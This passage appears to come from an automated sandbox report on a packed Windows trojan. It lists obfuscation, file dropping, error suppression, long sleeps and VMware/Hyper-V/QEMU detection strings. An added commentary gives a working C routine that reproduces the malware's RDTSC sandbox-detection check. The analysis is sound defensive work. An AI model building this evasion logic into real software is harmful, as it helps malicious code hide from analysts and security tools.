Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_088189F8 pushad ; retf 0_2_088189F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_088189FA push eax; retf 0_2_08818A01
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041DD78 pushfd ; ret 1_2_0041DD79
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_004175C7 push ss; ret 1_2_004175C8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00414E16 pushfd ; retf 1_2_00414E1F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0130D0D1 push ecx; ret 1_2_0130D0E4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047CD0D1 push ecx; ret 6_2_047CD0E4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015DD78 pushfd ; ret 6_2_0015DD79
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_001575C7 push ss; ret 6_2_001575C8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00154E16 pushfd ; retf 6_2_00154E1F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015CEB5 push eax; ret 6_2_0015CF08
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015CF02 push eax; ret 6_2_0015CF08
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015CF0B push eax; ret 6_2_0015CF72
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015CF6C push eax; ret 6_2_0015CF72

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File opened: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe\:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE@+K
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE10747
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE11798
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8116
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE10112
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 00000000001498E4 second address: 00000000001498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000000149B5E second address: 0000000000149B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D0A50000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D0BA0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D0CA0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D1110000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D1850000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D1CC0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1B8D1DC0000 memory commit | memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32C600000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32C720000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32C820000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32CBD0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32CF00000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32D800000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Memory allocated: 1D32D550000 memory commit | memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Windows\explorer.exe File opened / queried: scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\explorer.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
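The two signatures above (RDTSC-based virtualization detection, and the execution-timing function at 1_2_00409A90) describe the same check: the interceptor log shows the hollowed AddInProcess32.exe and mstsc.exe executing `rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc`, i.e. two back-to-back timestamp reads with only EAX, the low 32 bits of the counter, kept in between. The idea is that under a hypervisor that traps RDTSC, or under a debugger stepping the code, the gap between the two reads is orders of magnitude larger than on bare metal. The C program below is an added example written for this page, not code from the sample or from Joe Sandbox; it reproduces the measurement with the compiler's `__rdtsc()` intrinsic, falls back to the monotonic clock on non-x86 builds, and takes the minimum over many samples because a single large gap is just a context switch or an interrupt. The 0x1000-cycle threshold is an assumed value for illustration, not one recovered from the binary. Two caveats for defenders: the "RDTSC instruction interceptor" lines are the sandbox instrumenting the instruction, which is exactly what lets it report the check, and on current hypervisors RDTSC is usually not trapped at all, so this test is unreliable for the attacker and should not be read as proof that the sample would have behaved differently on hardware.

```c
#include <stdint.h>
#include <stdio.h>
#if defined(_MSC_VER) && (defined(_M_X64) || defined(_M_IX86))
#  include <intrin.h>
#  define HAVE_RDTSC 1
#elif defined(__x86_64__) || defined(__i386__)
#  include <x86intrin.h>
#  define HAVE_RDTSC 1
#else
#  include <time.h>
#  define HAVE_RDTSC 0   /* non-x86 build: fall back to the POSIX monotonic clock */
#endif

/* One timestamp read. The sample executes the instruction directly:
 *   rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc
 * keeping only EAX, the low 32 bits, between the two reads. */
static inline uint64_t tick(void)
{
#if HAVE_RDTSC
    return __rdtsc();
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* Gap between two back-to-back reads, truncated to 32 bits like the sample;
 * unsigned subtraction makes a low-half rollover harmless. */
uint32_t rdtsc_gap_low32(void)
{
    uint32_t first  = (uint32_t)tick();
    uint32_t second = (uint32_t)tick();
    return second - first;
}

/* Minimum over many samples. A single big gap is a context switch or an
 * interrupt; a large *minimum* means every rdtsc is expensive, which is what a
 * trapping hypervisor or a single-stepping debugger produces. Averages are
 * easy to skew by noise; the minimum is the robust statistic. */
uint32_t min_rdtsc_gap(int samples)
{
    uint32_t best = UINT32_MAX;
    for (int i = 0; i < samples; i++) {
        uint32_t g = rdtsc_gap_low32();
        if (g < best) best = g;
    }
    return best;
}

/* The decision as the malware would make it. ASSUMED_RDTSC_THRESHOLD is an
 * illustrative value; the sample's real cut-off is not in the report. */
#define ASSUMED_RDTSC_THRESHOLD 0x1000u
int looks_instrumented(uint32_t min_gap, uint32_t threshold)
{
    return min_gap > threshold;
}

int main(void)
{
    uint32_t g = min_rdtsc_gap(10000);
    printf("min rdtsc gap over 10000 samples: %u (%s)\n", g,
           looks_instrumented(g, ASSUMED_RDTSC_THRESHOLD) ? "looks instrumented"
                                                          : "looks like bare metal");
    return 0;
}
```

Running this inside a sandbox that hooks or single-steps RDTSC yields a minimum gap in the thousands; on a modern VM with a pass-through TSC the number is indistinguishable from hardware, which is why the check is weak evidence on its own.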
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 5832 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6856 Thread sleep count: 47 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6856 Thread sleep count: 120 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 6376 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe TID: 4820 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\mstsc.exe TID: 2088 Thread sleep time: -85000s >= -30000s
Source: explorer.exe, 00000010.00000003.900881622.000000000F25D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B1
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware horizon clientator xmplayerrizon c
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000010.00000002.1026871359.0000000000DEE000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000002.1046519388.000000000621D000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: cmd.txtQEMUqemu
Source: explorer.exe, 00000002.00000000.703940604.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: 7585*|voice & video calls*|skype1*|voice recorder*|vioce6945*|vmware player*|vmplayer4486*|voice recorder*|voive7212*|voice recorder*|recr7315*|trader workstation*|tws1*|vuze*|azu5812*|weather*|local weather6239*|virusscan console*|mc581*|tools command prompt*|cmd1*|visiontools pro-e*|vt431*|twitter*|twiter5581*|weather*|the weather6785*|visual studio 2013*|v
Source: explorer.exe, 00000010.00000003.907549674.000000000F48E000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9t
Source: explorer.exe, 00000010.00000003.887959259.00000000063B1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: explorer.exe, 00000002.00000000.695416216.0000000004755000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000010.00000003.902544793.00000000063F7000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B@c
Source: explorer.exe, 00000002.00000000.704088912.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe11333
Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
Source: explorer.exe, 00000010.00000003.902602832.000000000F48D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BW
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: *|vmware player*|vmplayer4486
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000010.00000003.831423585.00000000062FE000.00000004.00000001.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000002.1046519388.000000000621D000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}@
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: virusscan consolemberswill it rain todaytr consolevmware workstation 12 playerhrewcess manag
Source: SearchUI.exe, 00000016.00000002.893292909.000001B0CAFC5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW@b;
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: explorer.exe, 00000010.00000003.908089865.000000000EEB2000.00000004.00000001.sdmp Binary or memory string: }#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZZ[
Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000010.00000003.894123531.000000000F377000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
Source: explorer.exe, 00000010.00000003.900881622.000000000F25D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B<
